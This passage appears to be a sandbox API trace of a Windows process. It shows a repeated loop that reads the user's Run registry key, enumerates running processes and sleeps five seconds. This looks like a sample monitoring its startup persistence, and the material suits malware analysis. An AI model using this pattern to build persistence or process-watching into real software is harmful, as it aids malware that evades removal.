Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.814] NtClose (Handle=0x154) returned 0x0 [0177.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.818] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.826] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.826] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.826] NtClose (Handle=0x154) returned 0x0 [0177.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.831] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.840] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.841] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.841] NtClose (Handle=0x154) returned 0x0 [0177.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.845] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.856] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.856] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.856] NtClose (Handle=0x154) returned 0x0 [0177.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.861] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.873] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.873] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.873] NtClose (Handle=0x154) returned 0x0 [0177.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.877] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.888] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.888] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.888] NtClose (Handle=0x154) returned 0x0 [0177.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.889] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.892] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.903] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.903] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.903] NtClose (Handle=0x154) returned 0x0 [0177.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.908] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.920] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.920] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.920] NtClose (Handle=0x154) returned 0x0 [0177.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.925] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.934] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.934] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.934] NtClose (Handle=0x154) returned 0x0 [0177.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.940] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.950] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.950] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.950] NtClose (Handle=0x154) returned 0x0 [0177.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.955] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.965] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.965] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.965] NtClose (Handle=0x154) returned 0x0 [0177.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.970] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.981] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.981] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.981] NtClose (Handle=0x154) returned 0x0 [0177.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.986] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.996] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.996] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.997] NtClose (Handle=0x154) returned 0x0 [0177.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.001] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.012] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.012] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.012] NtClose (Handle=0x154) returned 0x0 [0178.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 